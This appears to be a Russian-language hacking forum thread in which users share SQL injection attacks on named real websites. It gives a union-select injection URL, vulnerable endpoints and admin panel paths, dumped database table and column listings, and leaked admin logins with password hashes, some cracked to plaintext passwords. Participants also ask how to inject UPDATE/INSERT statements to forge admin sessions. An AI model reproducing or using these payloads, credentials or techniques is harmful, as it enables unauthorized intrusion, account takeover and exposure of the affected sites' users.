http://www.rionews.com.ua/statja.php?id=11175+union+select+version(),2,3,4,5 ,6,7,8,9,0,1/*

4 версия

С чего вдруг???
Если ты написал version() в 16ричном виде, то это уже не version(), а строка version(). тут никакой подставы. Тут фишка в другом совсем.
В других местах все параметры экранируются. Пробой только в этом месте. Вероятно CMS, на которой построен портал сначала сама обрабатывает урлы (режет лишнее и подозрительные слова), а потом передает дальше, в бажные скрипты ))). Скорее всего это можно обойти, но у меня вариантов пока нет.

там php-nuke 6 версии, вот так можно выдрать логины хэши админов:

baska:d88e1207b4f325297ef25cb2b049b33b:
bete:217de01e5b8aad8ce45d75ddaa2a27a9:
eegiiz:4846eaa06bfc1fa22df6ebce7f390cc7:
aliye:aa70fea8443ea26ca24d204069147b71:
hehe:e10adc3949ba59abbe56e057f20f883e:123456

Доброе утро. http://sotka.ru/


Вот то что вытянул из базы (MSSQL)

NastrSet
infobj
NastrPhones
NastrList
Archive
History
Right_List
TV_Program
TreeList
Accessuars
accessuars_name
Hard
AllBase
History_Archive
Statii_Rubrics
AllPhone
Black_List
City
Instr
Constants
Statii_in_rubrics
sessions
>session_id
>session_user_id
>session_start
>session_time
>session_ip
>session_logged_in
>session_admin
Credits
sessions_keys
Glossary
TV_Picture
GuestBook
Jurnal
TV_Mistake
Jurnal_CFG
TV_Announce
Pictures
Mailer
Statii
Mailer_Log
Mistakes
Money
>id
>data
>num_subj
>num_credit
>credit
>in_out
>num_disp
Sotovik_Err
Digital_Tech
Operators
Pagers
Phones_S
RestrictedPhones
Users_contacts
Users_right
>id_user_rights
>id_rights_info
Users_rights_info
>id_right
>right_maxmess
>right_info
Users_list
>user_id
>user_active
>username
>user_password
>user_session_time
>user_lastvisit
>user_regdate
>user_email
>user_newpasswd
>user_notify
>user_regphone


Юзер с Id = 1 Это гость. С id=2 похоже на админа
Имя БД: Cotka
логин: Andre
хэш: 24f64722693735931efd98aa4bb37e9b

Скуль : http://sotka.ru/BS/view.asp?nm=SQLINJ

Также "Админка" http://sotka.ru/admin/
похоже ищет в таблице сессий ( вот тут session_admin) прежде чем пустить.

Вопрос вот такой: Там имеется табличка сессий, с соответствующими столбиками

Кто догадается как сделать UPDATE/INSERT ?
У меня не получается пока что

Пароль юзера Andre: paradis

Насколько я знаю, внтури селекта ни Апдейт ни Инсерт невозможно выполнить. По крайней мере в мускуле

Ну это и не мускуль -) А пароль мне ничего не дал -(
Делов том что залогинившись и пойдя в админку меня выкинуло! Хотя вчера когда я залогинен небыл, на ее индекс меня пускало...

http://www.cotraj.ru


Скуль http://www.cotraj.ru/catalog.php?cat=1{SQLINJ}

Database Version: 4.0.26
Database name: wwwcotrajru
User name: cotraj@yox.hc.ru

information_schema не пустили, имя таблиц узнать не удалось,хостер рбк

Очень содержательная скуль...кол-ва столбцов нет , с каких пор в 4.0.26 существует таблица information_schema ? =\ Она есть в версиях >5